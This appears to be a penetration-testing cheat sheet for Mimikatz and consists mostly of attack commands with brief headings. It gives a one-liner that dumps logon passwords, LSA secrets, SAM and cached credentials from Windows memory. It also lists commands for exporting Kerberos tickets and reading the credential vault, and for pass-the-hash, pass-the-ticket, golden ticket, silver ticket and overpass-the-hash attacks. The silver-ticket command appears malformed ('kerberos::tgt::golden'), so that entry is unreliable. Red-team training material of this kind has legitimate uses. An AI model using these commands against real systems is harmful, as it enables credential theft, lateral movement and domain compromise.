🥝Mimikatz Basics

Mimikatz is a powerful tool to extract plaintext credentials, hashes, and Kerberos tickets from memory. Typically run with Administrator or SYSTEM privileges, it’s vital for Windows privilege escalation and lateral movement.

Basic Commands

mimikatz.exe
privilege::debug
token::elevate

Extracting Credentials

Oneliner

.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"

Get NTLM Hashes from LSASS:

sekurlsa::logonpasswords

Dump Kerberos Tickets

sekurlsa::tickets /export

Dump Credential Manager

vault::cred

SAM Database

lsadump::sam

LSA Secrets

lsadump::secrets

Cached Domain Credentials

lsadump::cache

Lateral Movement

Pass-the-Hash Attack

sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:<command>

Pass The Ticket

kerberos::ptt <ticket.kirbi>

Golden Ticket

kerberos::golden /user:<username> /domain:<domain> /sid:<domain SID> /krbtgt:<krbtgt hash> /id:<RID> /target:<target FQDN> /renewmax:<duration> /ptt

Silver Ticket

kerberos::tgt::golden /user:<username> /domain:<domain> /sid:<domain SID> /service:<service> /target:<target FQDN> /rc4:<hash> /id:<RID> /ptt

Overpass-the-Hash

sekurlsa::pth /user:<username> /domain:<domain> /aes256:<AES key> /run:<command>

PreviousKernel Exploits NextEnumeration

Last updated 8 months ago